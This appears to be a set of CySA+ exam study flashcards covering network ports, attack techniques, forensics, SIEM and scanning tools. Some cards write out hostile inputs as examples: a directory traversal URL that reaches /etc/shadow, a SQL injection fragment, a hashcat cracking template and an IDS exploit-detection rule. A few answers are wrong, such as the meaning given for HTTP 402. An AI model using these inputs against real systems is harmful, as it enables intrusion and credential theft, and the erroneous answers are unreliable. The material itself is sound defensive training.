SPAN (Switched Port Analyzer)
- allows for the copying of ingress and/or egress communications from one or more switch ports to another (essentially it makes a copy of everything coming in or out of a port and then puts that on a duplicate port so you can then monitor it) - once you have a SPAN port configured you need to enable packet sniffing
aircrack-ng
- allows us to extract the authentication key and try to retrieve the plain text version of your password for that network - effective against all WEP-based networks - RADIUS authentication is an effective mitigation against aircrack-ng
aireplay-ng
- allows us to inject frames to perform attacks to obtain authentication credentials for an access point, - this occurs by deauthenticating the victim from a device and then try to reconnect to that device when I capture your reauthentication
Simple Object Access Protocol (SOAP)
- an XML-based web services protocol that is used to exchange messages - supports authentication, transport security, asynchronous messaging, and built-in error handling (leverage Web Services Security, WS-Security, extensions to enforce integrity and confidentiality via SOAP) (web services using SOAP may be vulnerable to different exploits such as probing, coercive parsing, external references, malware, SQL injection)
Directory Traversal
- an application injection attack that allows access to commands, files, and directories that may or may not be connected to the web document root directory - may be used to access any file on a system with the right permissions (e.g, http://diontraining.com/../../../../etc/shadow) (Unix systems use ../ but Windows systems use ..\) (*WARNING: attackers may use encoding to hide directory traversal attempts, for example, %2e%2e%2f represents ../)
Document Object Model (DOM) XSS
- an attack that exploits the client's web browser using *client-side* scripts to modify the content and layout of a webpage - runs with the logged in user's privileges of the local system
Reverse Shell
- an attacker opens a listening port on the remote host and causes the infected host to connect to it - is used to exploit organizations that have not configured outbound traffic filtering at the firewall - attackers use Netcat (nc) to perform these actions
Secure Multipurpose Internet Mail Extensions (S/MIME)
- an email encryption standard that adds digital signatures and public key cryptography to traditional MIME communications - in order for this to work, a user is issued a digital certificate containing his or her public key in order to use S/MIME
Active Scan (Vulnerability Scanner Types)
- an enumeration or vulnerability scan that analyzes the responses from probes sent to a target (consumes network bandwidth and processor resources) - can be configured as a credentialed, non-credentialed, server-based, or agent-based scan
Vulnerability Assessment
- an evaluation of a system's security and ability to meet compliance requirements based on the configuration state of the system as represented by information collected from the system (3 main steps) 1. collect a set of target attributes 2. analyze the differences in the current and baseline configurations 3. report the results
Factors Indicating a DDoS Attack
- an excessive number of TIME_WAIT connections in a load balancer or web servers state table - high numbers of HTTP 503 Service Unavailable log events - if you see a large amount of outbound traffic from your network, it could indicate your network contains victimized hosts being used in a DDoS against other people - IOCs with DDoS attack include bandwidth consumption and traffic spikes (*but these can be indicators for other types of attacks too)
Mimikatz
- an open-source application that allows users to view and save authentication credentials in order to perform pass the hash attacks - scans system memory for cached passwords processed by the Local Security Authority Subsystem Service (lsass.exe)
hping
- an open-source spoofing tool that provides a pentester with the ability to craft network packets to exploit vulnerable firewalls and IDS/IPS - host/port detection and firewall testing - timestamping - traceroute - fragmentation - DoS
What is the difference between Behavioral Analysis and Anomaly Analysis?
- anomaly analysis uses prescribed patterns (like an RFC or industry standard), whereas behavioral analysis records expected patterns in relation to the device being monitored - in other words, with anomaly analysis we are looking at everything following a standard - with behavioral analysis we are making up our own standard based on the observed patterns on that device
Input Validation
- any technique used to ensure that the data entered into a field or variable in an application is handled appropriately by that application - can be conducted locally (on client) or remotely (on server) (*WARNING: client-side input validation is more dangerous since it is vulnerable to malware interference) (server-side input validation can be time and resource intensive) (useful against XML, SQL, Directory Traversal, XSS injection attacks)
Irregular Peer-to-Peer (P2P) Communication
- attack indicator where hosts within a network establish connections over unauthorized ports or data transfers - attackers commonly use Server Message Block (SMB) since it is typical within Windows File/Printer sharing environments
How can you mitigate a DGA?
- best mitigation is to use a Secure Recursive DNS Resolver - occurs when one trusted DNS server communicates with several other trusted DNS servers to hunt down an IP address and returns it to the client
Unprotected Storage (Cloud Threats)
- cloud storage containers are referred to as buckets (AWS) or blobs (Azure) - incorrect permissions may occur due to default read/write permissions leftover from creation - incorrect origin settings may occur when using content delivery networks (CORS policy) (*WARNING: Access control to storage is administered through container policies, IAM authorizations, and object ACLs)
ELK/Elastic Stack
- collection of free and open-source SIEM tools that provides storage, search and analysis functions - made up of 4 different components: Elasticsearch (query/analytics), Logstash (log collection/normalization), Kibana (visualization), Beats (endpoint collection agents)
Covert Channels
- communication path that allows data to be sent outside of the network without alerting any intrusion detection or data loss countermeasures - covert channels enable the stealthy transmission of data from node to node using means that your security controls do not anticipate
Physical Access Control System (PACS)
- components and protocols that facilitate the centralized configuration and monitoring of security mechanisms within offices and data centers - can either be implemented as part of a building automation system (BAS) or a separate system (*WARNING: PACS are often installed and maintained by an external supplier and are therefore omitted from risk and vulnerability assessments by analysts)
Bus Encryption
- data is encrypted by an application prior to being placed on the data bus - ensures that the device at the end of the bus is trusted to decrypt the data
Features of MDM/EMM systems
- device enrollment and authentication (asset tracking) - remote lock and remote wipe - identifying device locations - patch and update deployments - preventing root/jailbreaks - create encrypted containers for data - restricting features/services of applications - can be used to manage incidents and conduct investigations
Code Injection
- exploit technique that runs malicious code with the identification number of a legitimate process - techniques include: masquerading (where your dropper is going to replace a genuine executable with a malicious one), DLL injection (where the dropper starts forcing a process to load as part of the DLL), DLL sideloading (where the dropper is going to exploit a vulnerability in a legitimate programs manifest to load a malicious DLL at runtime), and process hollowing (this is when a dropper starts a process in a suspended state and then rewrites the memory locations containing the process code with the malware code)
Living Off the Land *
- exploit techniques that use standard system tools and packages to perform intrusions - detection of an adversary is more difficult when they are executing malware code within standard tools and processes
SIEM Queries
- extracts records from among all the data stored for review or to show as visualization - uses Select (some fields), Where (some set of conditions), Sorted By (some fields)
What are 2 anti-tamper mechanisms to protect your systems?
- field programmable gate array (FPGA) - physically unclonable function (PUF)
How are SMTP logs typically formatted and what will we typically see in these type of logs?
- formatted in request/response fashion - see things like time of request/response, address of recipient, size of message and status code
Fingerprinting *
- identifying the type and version of an operating system (or server application) by analyzing its responses to network scans (targeting one machine) - tools that perform host system detection to map out open ports, OS type and version, file shares, running services and applications, system uptime, and other useful metadata
Patch Management
- identifying, testing, and deploying OS and application updates (fixing security bugs) - classified as critical, security-critical, recommended, and optional
How can you detect a DGA/Fast Flux Network?
- if you start seeing a lot of call-outs from you systems to random IP addresses that look like this (A1ZWBR93.com, 94ZGYS9.com, etc) - if you get a high rate of NXDOMAIN errors when resolving the DNS
Sensitive Personal Information (SPI)
- information about a subject's opinions, beliefs, and nature that is afforded specially protected status by privacy legislation - the GDPR definition of SPI includes religious beliefs, political opinions, trade union membership, gender, sexual orientation, racial or ethnic origin, genetic data, and health information
How can we mitigate/prevent Buffer Overflow attacks?
- input validation - ASLR - run programs with least privilege
What are the 4 major threats facing the Cloud?
- insecure API - improper key management - insufficient logging and monitoring - unprotected storage
Certificate Management includes
- installing, updating, and validating trusted root certificates - deploying, updating, and revoking subject certificates - preventing the use of self-signed certificates - SSH key management (cryptographic key pairs)
Benefits of DevSecOps
- integrate security from the beginning - test during and after development - automate compliance checks
Open-Source Intelligence (OSINT)
- publicly available information plus the tools used to aggregate and search it - sources: publicly available information, social media, HTML code, metadata
Firewalking
- reconnaissance technique to enumerate firewall configuration and attempt to probe hosts behind it - occurs when an attacker can find an open port on the firewall, then sends a packet with a TTL of one past the firewall to find its hosts
Port Security
- refers to the blocking of unauthorized application service ports on hosts and firewalls, or the physical and remote access ports used to allow a host to communicate on the local network - recommendations: disable web administrative interfaces and use SSH shells instead for increased security
How do you mitigate false negatives when performing a vulnerability scan?
- run repeated scans - use different scan types (or different scanner) - use different sensitivities
Benefits of a SOAR
- scans security/threat data - analyze it with ML (machine learning) - automate data enrichment process - provision new resources (incident response)
Common Platform Enumeration (CPE)
- scheme for identifying hardware devices, operating systems, and applications by MITRE corporation - database of different fingerprint signatures (this is how nmap is able to run fingerprint scans)
Nmap Scripting Engine (NSE)
- scripts are written in the Lua scripting language that can be used to carry out detailed probes - includes: OS detection and platform enumeration, Windows user account discovery, identify logged-on Windows user, basic vulnerability detection, get HTTP data and identify applications, and geolocation to traceroute probes
What are some benefits to using a CASB?
- single sign-on - malware and rogue device detection - monitor/audit user activity - mitigate data exfiltration
Premise Systems
- systems used for building automation and physical access security - many system designs allow the monitoring to be accessible from the corporate data network or even directly from the Internet
Persistence *
- the ability of a threat actor to maintain covert access to a target host or network - usually relies on modifying the Registry or a system's scheduled tasks
Secure Enclave
- the extensions allow a trusted process to create an encrypted container for sensitive data (helps prevent buffer overflow attacks) - store encryption keys and other sensitive data
File Signature (or Magic Number)
- the first two bytes of a binary header that indicates its file type - Windows portable executable file will always start with 4D 5A in HEX, MZ in ASCII, or TV in Base64 encoding
Attack Surface
- the points at which a network or application receives external connections or inputs/outputs that are potential vectors to be exploited by a threat actor - 3 main areas to consider: the holistic network, websites or cloud-services, custom software applications
File Carving
- the process of extracting data from a computer when that data has no associated file system metadata - attempts to piece together data fragments from unallocated and slack space to reconstruct deleted files or at least parts of those files
Digital Forensics
- the process of gathering and submitting computer evidence to trial and interpreting that evidence by providing expert analysis - uses specialist tools and skills to recover information from computer systems, memory and storage
Threat Modeling
- the process of identifying and assessing the possible threat actors and attack vectors that pose a risk to the security of an app, network or other system - 3 main areas to consider: Adversary Capability, Attack Surface, Attack Vector
Data enrichment
- the process of incorporating new updates and information to an organization's existing database to improve accuracy - when data enrichment is occurring, it could combine a threat intelligence feed with a log of NetFlow. This will allow an analyst to know if an IP address of interest is actually associated with a known APT (AI-based systems combine indicators from multiple threat feeds to reduce false positives and false negatives) (AI-based systems can identify obfuscated malware better than their human counterparts)
System Hardening *
- the process of securing a system's configuration and settings to reduce IT vulnerability and the possibility of being compromised (one of the most effective preventative measures when designing the system's security) - includes deactivating unnecessary components (ports, processes, applications, etc), disable unused user accounts (guest, ex-employee), implement patch management, restrict host access to peripherals (USB, Bluetooth) and restrict shell commands
Software Development Life Cycle (SDLC)
- the processes of planning, analysis, design, implementation, and maintenance that governs software and systems development - it is important to integrate security controls into each stage of the SDLC - Waterfall and Agile methods
System Assessments
- the systematic identification of critical systems by compiling an inventory of the business processes and the tangible and intangible assets and resources that support those processes - conducted to better posture and organization to reduce risk and prevent losses - consider the people, tangible assets, intangible assets and procedures
Pivoting
- the use of one infected computer to attack a different computer - uses the compromised system to attack other systems on the same network to avoid restrictions such as firewall configurations
When using tcpdump, which option or flag would you use to record the ethernet frames during a packet capture?
-e
While performing a vulnerability scan, Christina discovered an administrative interface to a storage system is exposed to the internet. She looks through the firewall logs and attempts to determine whether any access attempts have occurred from external sources. Which of the following IP addresses in the firewall logs would indicate a connection attempt from an external source?
192.186.1.100
- r-- --- --- filename
400
- rw- r-- r-- filename
644
- rwx r-x --- filename
750
- rwx rwx rwx filename
777
A cybersecurity analyst is attempting to perform an active reconnaissance technique to audit their company's security controls. Which DNS assessment technique would be classified as active?
A zone transfer
Egress Filtering
ACL rules that are applied to traffic leaving a network to prevent malware from communicating to C2 (Command and Control) servers
SLE (single loss expectancy) x ARO (annual rate of occurrence) =
ALE (annual loss expectancy)
________ and ________ are part of Sysinternals and can analyze privileges applied to a file or resource
AccessChk, AccessEnum
You are reviewing a rule within your organization's IDS. You see the following output: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any msg: "BROWSER-IE Microsoft Internet Explorer CacheSize exploit attempt"; flow: to_client,established; file_data; content:"recordset"; offset:14; depth:9; content:".CacheSize"; distance:0; within:100; pcre:"/CacheSize\s*=\s*/"; byte_test:10,>,0x3ffffffe,0,relative,string; max-detect-ips drop, service http; reference:cve,2016-8077; classtype: attempted-user; sid:65535;rev:1; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
An inbound malicious TCP packet
You have been asked to review the SIEM event logs for suspected APT activity. You have been given several indicators of compromise, such as a list of domain names and IP addresses. What is the BEST action to take in order to analyze the suspected APT activity?
Analyze the trends of events while manually reviewing them to see if any indicators match
Alexa is an analyst for a large bank that has offices in multiple states. She wants to create an alert to detect when an employee from one bank office logs into a workstation located at an office in another state. What type of detection and analysis is Alexa configuring?
Behavior
Which programming languages are extremely vulnerable to buffer overflow attacks? *
C/C++ (strcpy in C/C++ does not perform boundary checking of buffers)
Vehicles connect numerous subsystems over a ______
CAN (controller area network)
You are conducting a forensic analysis of a hard disk and need to access a file that appears to have been deleted. Upon analysis, you have determined that data fragments from the file exist scattered across the unallocated and slack space of the drive. Which technique could you use to recover the data?
Carving
How do you use Hashcat?
hashcat -m <HashType> -a <AttackMode> -o <OutputFile> <InputHashFile>
Port 68 (UDP)
DHCP (client port for DHCP)
Port 67 (UDP)
DHCP (server port for DHCP)
During the analysis of data as part of ongoing security monitoring activities, which of the following is NOT a good source of information to validate the results of an analyst's vulnerability scans of the network's domain controllers?
DMARC and DKIM
_____ is an effective command and control channel since it doesn't need a direct connection to the outside network and instead can use a local DNS resolver
DNS
Sender Policy Framework (SPF)
DNS record identifying hosts authorized to send mail for the domain with only one being allowed per domain (e.g, TXT @ v=spf1 mx include:_spf.google.com include:email.freshdesk.com -all)
how do you create a rule to send an alert if multiple user log-on failures occur within one hour from a single account
Error.LogonFailure > 3 AND LogonFailure.User AND Duration < 1 hour
Port 21 (TCP)
FTP (file transfer protocol)
Port 80 (TCP)
HTTP (HyperText Transfer Protocol)
Port 8080 (TCP)
HTTP-PROXY (HTTP proxy service or alternate port for HTTP)
Port 443 (TCP)
HTTPS
Port 143 (TCP)
IMAP (internet mail access protocol)
Port 993 (TCP)
IMAPS (over SSL/TLS)
How do you know if its legitimate DNS traffic or an IOC?
IOC #1: same query is repeated several times when a bot is checking into a control server for more orders (normal DNS queries happen once) IOC #2: commands sent within request or response queries will be longer and more complicated than normal
Port 631 (UDP port)
IPP (internet printing protocol)
Data in transit is protected by transport encryption protocols like
IPsec (using VPNs), TLS (connecting over the web), or WPA2 (local area network)
Port 500 (UDP port)
ISAKMP (internet security association and key management protocol that is used to set up IPsec tunnels)
Response Code 500 (URL Analysis)
Indicates a general error on the server-side of the application
You are the first forensic analyst to arrive on the scene of a data breach. You have been asked to begin evidence collection on the server while waiting for the rest of your team to arrive. Which of the following evidence should you capture first?
L3 cache (cache memory)
Security Development Life Cycle (SDL)
Microsoft's security framework for application development that supports dynamic development processes (agile method)
Port 123 (UDP)
NTP (network time protocol)
Port 138 (UDP)
NetBIOS-DGM (NetBIOS datagram service supports Windows File Sharing with pre-Windows 2000 version hosts)
Port 137 (UDP)
NetBIOS-NS (NetBIOS name service supports Window File Sharing with pre-Windows 2000 version hosts)
Port 139 (UDP)
NetBIOS-SSN
Port 139 (TCP)
NetBIOS-SSN (NetBIOS session service supports Windows File Sharing with pre-Windows 2000 version hosts) (Windows only)
Email Harvesting
OSINT techniques used to gather email addresses for a domain
While studying for your CompTIA CySA+ course at Dion Training, you decided you want to install a SIEM to collect data on your home network and its systems. You do not want to spend any money purchasing a license, so you decide to use an open-source option instead. Which of the following SIEM solutions utilize an open-source licensing model?
OSSIM
OODA Loop (Don't Need to Know for Exam but for the Real World)
Observe, Orient, Decide, Act (continuous loop)
Shimcache
an application usage cache that is stored in the Registry as the key (HKLM\SYSTEM\CurrentControlSet\Control\SessionManager\AppCompatCache\AppCompatCach)
To prevent directory traversals and file inclusion attacks, use proper __________
input validation
Port 110 (TCP)
POP3 (post office protocol is a legacy mailbox access protocol)
Port 995 (TCP)
POP3S (over SSL/TLS)
Port 1723 (TCP)
PPTP (point-to-point tunneling protocol is a legacy VPN protocol with weak security implementation)
Port 3389 (TCP)
RDP (remote desktop protocol) (Windows only)
Port 520 (UDP port)
RIP (routing information protocol)
Port 111 (TCP)
RPCBIND (maps remote procedure call ~RPC~ services to port numbers in a UNIX-like environment) (Unix, Linux, MacOS only)
A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, https://www.google.com/search?q=*%40diontraining.com. Which of the following is true about the results of this search?
Returns all webpages containing an email address affiliated with diontraining.com
Windows has two types of autorun keys: (keys attackers use to gain persistence)
Run, RunOnce
AV (asset value) x EF (exposure factor/probability) =
SLE (single loss expectancy)
Port 25 (TCP)
SMTP (simple mail transfer protocol)
Port 161 (UDP)
SNMP (agent port for SNMP)
Port 162 (UDP)
SNMP (management station port for receiving SNMP trap messages)
Port 22 (TCP)
SSH/SFTP (Secure File Transfer Protocol)
You are conducting an investigation on a suspected compromise. You have noticed several files that you don't recognize. How can you quickly and effectively check if the files have been infected with malware?
Submit the files to an open-source intelligence provider like VirusTotal
Port 514 (UDP port)
Syslog (server port for a syslog daemon)
Attacker now use domain generated algorithms to overcome blacklists (T/F)
T
Port 69 (UDP)
TFTP (trivial file transfer protocol)
You just received a notification that your company's email servers have been blacklisted due to reports of spam originating from your domain. What information do you need to start investigating the source of the spam emails?
The full email header from one of the spam messages
Posture Assessment
The process of assessing the endpoint for compliance with the health policy (health policy refers to a list of things that we're going to check for that device and see if it has and meets certain standards/requirements)
Which technique would provide the largest increase in security on a network with ICS, SCADA, or IoT devices?
User and Entity Behavior Analytics (UEBA)
Your company just launched a new invoicing website for use by your five largest vendors. You are the cybersecurity analyst and have been receiving numerous phone calls that the webpage is timing out and the website overall is performing slowly. You have noticed that the website received three million requests in just 24 hours and the service has now become unavailable for use. What do you recommend should be implemented to restore and maintain the availability of the new invoicing system?
Whitelisting
icacls
Windows command-line tool for showing and modifying file permissions (N - no access, F - full access, R - read only, RX - read and execute, M - modify, W - write, D - delete)
Local Users and Groups (new accounts)
Windows tool that is used for the management of local accounts on a system
Legal Hold (Forensic Procedures)
a process designed to preserve all relevant information when litigation (lawsuit) is reasonable expected to occur
System Memory Image Acquisition
a process that creates an image file of the system memory that can be analyzed to identify the processes that are running, the contents of temporary file systems, Registry data, network connections, cryptographic keys and more
Disk Image Acquisition
a process that creates an image file of the system's disks that can be analyzed to identify current, deleted, and hidden files on a given disk (hard drive, solid state drive, USB thumb drive, etc)
Field Programmable Gate Array (FPGA)
a processor that can be programmed to perform a specific function by a customer rather than at the time of manufacture
Idempotence
a property of IaC that an automation or orchestration action always produces the same result, regardless of the component's previous state
Trusted Automated eXchange of Indicator Information (TAXII - Indicator Management)
a protocol for supplying codified information to automate incident detection and analysis
Infrastructure as Code (IaC)
a provisioning architecture in which deployment of resources is performed by scripted automation and orchestration (allows for the use of scripted approaches to provisioning infrastructure in the cloud, making it more secure) (robust orchestration can lower overall IT costs, speed up deployments, and increase security) (uses carefully developed and tested scripts and orchestration runbooks to generate consistent builds)
whois
a public listing of all registered domains and their registered administrators
Key Performance Indicators (KPIs)
a quantifiable measure used to evaluate the success of an organization, employee, or other element in meeting objectives for performance
Penetration Test
a red team attempts to conduct an intrusion of the network using a specific scenario based on threat modeling
Deep Learning
a refinement of machine learning that enables a machine to develop strategies for solving a task given a labeled dataset and without further explicit instructions (uses complex classes of knowledge defined in relation to simpler classes of knowledge to make more informed determinations about an environment)
Indicators of Compromise (IoC)
a residual sign that an asset or network has been successfully attacked or is continuing to be attacked (evidence that an attack was successful)
Common Vulnerability Scoring System (CVSS)
a risk management approach to quantifying vulnerability data and then taking into account the degree of risk to different types of systems or information
Data Steward
a role focused on the quality of the data and associated metadata
Data Custodian
a role responsible for handling the management of the system on which the data assets are stored (e.g, System Administrator)
Privacy Officer
a role responsible for the oversight of any PII/SPI/PHI assets managed by the company
Classification (DLP Discovery and Classification)
a rule based on a confidentiality classification tag or label attached to the data
Compliance Scans
a scan based on a compliance template or checklist to ensure the controls and configuration settings are properly applied to a given target or host (*PCI DSS which requires a quarterly scan*)
Sweep
a scan directed at multiple IP addresses to discover whether a host responds to connection requests for particular ports
Fast/Basic Assessment Scan
a scan that contains options for analyzing hosts for unpatched software vulnerabilities and configuration issues
Service-Oriented Architecture (SOA)
a software architecture where components of the solution are conceived as loosely coupled services not dependent on a single platform type or technology (is an overall design architecture for mapping business workflows to the IT systems that support them)
awk (scripting tools)
a scripting engine geared toward modifying and extracting data from files or data streams in Unix, Linux, and MacOS systems
Bash (scripting tools)
a scripting language and command shell for Unix-like systems that is the default shell for Linux and MacOS
PowerShell (scripting tools)
a scripting language and command shell for Windows
Shodan (shodan.io)
a search engine optimized for identifying vulnerable internet-attached devices
Virtual Private Network (VPN)
a secure tunnel created between two endpoints connected via an unsecure network, usually over the Internet (IPsec, SSH, TLS are all forms of VPNs)
Forward Proxy (CASB)
a security appliance or host positioned at the client network edge that forwards user traffic to the cloud network if the contents of that traffic comply with policy (*WARNING: users may be able to evade the proxy and connect directly*)
Identity and Access Management (IAM)
a security process that provides identification, authentication, and authorization mechanisms for users, computers, and other entities to work with organizational assets like networks, operating systems, and applications
Data Owner
a senior (executive) role with ultimate responsibility for maintaining the CIA of the information asset (is responsible for labeling the asset and ensuring that it is protected with appropriate controls)
Forward Proxy
a server that mediates the communications between a client and another server, can filter or modify communications, and provides caching services to improve performance
Dictionary (DLP Discovery and Classification)
a set of patterns that should be matched
Traffic Spikes
a sharp increase in connection requests in comparison with a given baseline
Indicator of Compromise (IOCs)
a sign that an asset or network has been attacked or is currently under attack
Intrusion Detection System (IDS)
a software and/or hardware system that scans, audits, and monitors the security infrastructure for signs of attacks in progress
Intrusion Prevention System (IPS)
a software and/or hardware system that scans, audits, and monitors the security infrastructure for signs of attacks in progress and can actively block the attacks
Representational State Transfer (REST)
a software architectural style that defines a set of constraints to be used for creating web application services (supports HTTP, XML, CSV, or JSON formatted messages)
Serverless
a software architecture that runs functions within virtualized runtime containers in a cloud rather than on dedicated server instances (depends on orchestration) (everything in serverless is developed as a function or microservice) (eliminates the need to manage physical or virtual servers) (benefits include: no patching, no administration, no file system monitoring) (e.g, Netflix)
Microservices
a software architecture where components of the solution are conceived as highly decoupled services not dependent on a single platform type or technology (is a design paradigm applied to application development)
Amcache
an application usage cache that is stored as a hive file at (C:\Windows\appcompat\Programs\Amcache.hve)
permissions
all types of permissions should be reviewed and reinforced after an incident (change your password)
Multipurpose Internet Mail Extensions (MIME)
allows a body of an email to support different formats, such as HTML, rich text format (RTF), binary data encoded as Base64 ASCII characters, and attachments
airodump-ng
allows us to capture wireless frames that are going across the air, identify information about the wireless access point based on its MAC address, and identify clients based on their MAC address
airmon-ng
allows us to enable/disable monitor mode on our cards
a Memory Analysis tool ...
allows you to reverse engineer the code used by processes, discover how processes interact with the file system (handles) and Registry, examine network connections, retrieve cryptographic keys, and extract strings from the system memory (this can all be done once you have a memory dump)
Port Hopping
an APTs C2 application might use any port to communicate and may jump between different ports
Open Vulnerability and Assessment Language (OVAL)
an XML schema for describing system security state and querying vulnerability reports and information
Extensible Configuration Checklist Description Format (XCCDF)
an XML schema for developing and auditing best-practice configuration checklists and rules
Security Assertions Markup Language (SAML)
an XML-based data format used to exchange authentication information between a client and a service (pairs with the SOAP protocol) (provides SSO and federated identity management)
Jitter (beaconing)
an adversary's use of a random delay to frustrate indicators based on regular connection attempt intervals
Agent-based (Data Normalization)
an agent service is installed on each host to log, filter, aggregate and normalize data on the host before sending it to the SIEM server for analysis and storage
Data Sharing and Use Agreement
an agreement that sets forth the terms under which personal data can be shared or used
Interconnection Security Agreement (ISA)
an agreement used by federal agencies to set out a security risk awareness process and commit the agency and supplier to implementing security controls
Lessons Learned
an analysis of events that can provide insight into how to improve response processes in the future
Hardware Security Module (HSM)
an appliance for generating and storing cryptographic keys that is less susceptible to tampering and insider threats than software-based storage
Reverse Proxy (CASB)
an appliance positioned at the cloud network edge and directs traffic to cloud services if the contents of that traffic comply with policy (*WARNING: this approach can only be used if the cloud application has proxy support*)
Implementation Tiers
assesses how closely core functions are integrated with the organization's overall risk management process and each tier is classed as Partial (low on scale), Risk Informed, Repeatable, and Adaptive (high on scale)
SQL Injection
attack consisting of the insertion or injection of an SQL query via input data from the client to a web application (e.g, `OR 1=1;)
Fragmentation (hping)
attempts to evade detection by IDS/IPS and firewalls by sending fragmented packets across the network for later reassembly (fragmentation and DoS not likely to be effective against most modern OS and network appliances)
IOC for Data Exfiltration using Explicit Tunnels
atypical endpoints involved in tunnels (VPN/SSH connections) due to their geographic location
IOC for Data Exfiltration using DNS
atypical query types being used, such as TXT, MX, CNAME, and NULL
Spoofing attacks can be mitigated by configuring _________ for email server systems
authentication
Command and control network hosts ...
can be difficult to identify or block since they change DNS names and IP addresses using domain generation algorithms (DGA) and fast flux DNS
Process and Memory Analysis (Virtualization Forensics)
can be performed by VM introspection (VMI) or analyzing save state files
a Registry viewer tool
can extract the Windows Registry files from an image and display them on the analysis workstation
The Microsoft Policy Analyzer ...
can identify whether a policy deviates from a configuration baseline
Disk utilization tools ...
can scan a file system and retrieve comprehensive statistics (e.g, visual representation, directory listing, real-time usage of data being written)
Full Packet Capture (FPC)
captures the entire packet including the header and the payload for all traffic entering and leaving a network
classtype (rule options)
categorizes the attack (bruteforce, DoS, etc)
Slashdot Effect (slashdotting)
causing a website to crash when a smaller website becomes popular quickly due to exposure on social sharing sites like Slashdot, Reddit and Twitter
What is one type of DoS attack method?
causing an application to overrun its memory buffer to trigger an execution failure
Atomic Execution
certain operations that should only be performed once or not at all, such as initializing a memory location (helps prevent buffer overflow attacks and race conditions)
Digital Rights Management (DRM)
copyright protection technologies for digital media which attempts to mitigate the risk of unauthorized copies being distributed
Analysis (Forensic Procedures)
create a copy of evidence for analysis and use repeatable methods and tools during analysis
Reporting (Forensic Procedures)
create a report of the methods and tools used in investigation and present detailed findings and conclusions based on the analysis
PUT (URL Analysis)
creates or replaces the requested resource
Fieldbus
digital serial data communications used in operational technology networks to link PLCs
BYOD policies complicate ______ _________ since you may not be able to legally search or seize the device
data acquisition
Insecure API (Cloud Threats)
data received by an API must pass server-side validation routines use proper error handling (sanitizing error messages) implement throttling/rate-limiting mechanisms to protect from a DoS (must secure your APIs using end-to-end encryption) (*WARNING: an API must only be used over an encrypted channel, such as HTTPS*)
The Windows ___ command has some advanced functionality for file system analysis
dir
There are principles of _________ and __________ that govern the exchange of evidence between prosecution and defense in a civil or criminal trial (Work Product Retention)
discovery, disclosure
( ) (regex syntax)
defines a matching group with a regex sequence placed within the parentheses, and then each group can subsequently be referred to by \1 for the first group, \2 for the second, and so on
Detection & Analysis (Incident Response Phases)
determine if an incident has taken place, triage it (categorize it and prioritize it), and notify stakeholders
Scope
different keywords that can be used to select the scope of the search, such as site, filetype, related, allintitle, allinurl, or allinanchor
net start
displays all running services on a computer from the command line
w (new accounts)
displays the same basic information as who, but also returns the remote host (if applicable), how long the account has been idle, the name of processes the account is actively running, the execution time of each process, and more (useful for adversary hunting)
rwho (new accounts)
displays the same basic information as who, but runs on a client/server architecture (useful for adversary hunting)
Request for Change (RFC)
document that lists the reason for a change and the procedures to implement that change
Physical Segmentation
each network segment has its own switch, and only devices connected to that switch can communicate with each other
Cloud Access Security Broker (CASB)
enterprise management software designed to mediate access to cloud services by users across all types of devices (essentially, it is the middle man that helps with authentication and ensures people are using only the services they are allowed to use) (provides visibility into how clients and other network nodes use cloud services) (can be set up as either a forward proxy, reverse proxy, or API)
Frequency-based Analysis
establishes a baseline for a metric and monitors the number of occurrences over time
Fileless Malware
executes from memory without saving anything to the filesystem
Tabletop Exercise (TTX)
exercise that uses an incident response scenario against a framework of controls or a red team
Write Blockers
forensic tool to prevent the capture or analysis device or workstation from changing data on a target disk or media (hardware write blockers are fool proof and reliable)
Response Code 502 (URL Analysis)
indicates a bad gateway has occurred when the server is acting as a proxy
Response Code 504 (URL Analysis)
indicates a gateway timeout means an issue with the upstream server
Response Code 200 (URL Analysis)
indicates a successful GET or POST request
Response Code 503 (URL Analysis)
indicates an overloading of the server is causing service unavailability
Response Code 404 (URL Analysis)
indicates that a client is requested a non-existent resource (very common)
Response Code 400 (URL Analysis)
indicates that a request could not be parsed by the server
Response Code 402 (URL Analysis)
indicates that a request did not have sufficient permissions
Response Code 401 (URL Analysis)
indicates that a request did not supply authentication credentials
Status Code 450 (SMTP Log Analysis)
indicates that the server can not access the mailbox to deliver the message
Status Code 451 (SMTP Log Analysis)
indicates the local server aborted the action due to a processing error
Status Code 452 (SMTP Log Analysis)
indicates the local server has insufficient storage space available
Status Code 250 (SMTP Log Analysis) *
indicates the message is accepted
Status Code 220 (SMTP Log Analysis) *
indicates the server is ready
Status Code 421 (SMTP Log Analysis)
indicates the service is not available
Response Code 201 (URL Analysis)
indicates where a PUT request has succeeded in creating a resource
Run * (persistence)
initializes its values asynchronously when loading them from the Registry
RunOnce * (persistence)
initializes its values in order when loading them from the registry
Human-Machine Interface (HMI)
input and output controls on a PLC to allow a user to configure and monitor the system
Server-side code should always utilize _________
input validation
To prevent XML vulnerabilities from being exploited, use proper __________
input validation
To prevent XSS attacks, use proper _________
input validation
Interactive Disassembler (IDA)
is a popular cross-platform disassembler and decompiler used by reverse engineers
Yara rule
is a test for matching certain string combinations within a given data source (binary, log file, packet capture, or email)
# (URL Analysis)
is used to indicate a fragment or anchor ID and is not processed by the webserver
nmap --scan-delay <Time> (Sparse Scanning)
issues probes with significant delays to become stealthier and avoid detection by an IDS or IPS
nmap -Tn (Scan Timing)
issues probes with using a timing pattern with n being the pattern to utilize (0 is slowest and 5 is fastest)
Forensic workstations
must have access to a high-capacity disk array subsystem or storage area network (SAN)
Virtual Segmentation *
network segmentation that relies on VLANs to create equivalent segmentation that would occur if you used physical switches
What is the nmap command to perform an intensive port scan? (intensive fingerprint scan)
nmap -sV <IP address> or nmap -A <IP address> (provides more detailed information, such as protocols, application name and version, OS type and version, host name and device type)
User Interaction (UI) (CVSS)
none (N) or required (R)
Privileges Required (PR) (CVSS)
none (N), low (L), or high (H)
Correlation rules depend on ______ data
normalized
OpenVAS
open source vulnerability scanner that began its development from the Nessus codebase when Nessus was converted to commercial software
General Data Protection Regulation (GDPR)
personal data cannot be collected, processed, or retained without the individuals informed consent (European law that provides stronger protections than the US)
Access Vector (AV) (CVSS)
physical (P), local (L), adjacent network (A), or network (N)
physical port security
physical access to the switch ports and switch hardware should be restricted to authorized staff (switches should be locked in a network closet/cabinet)
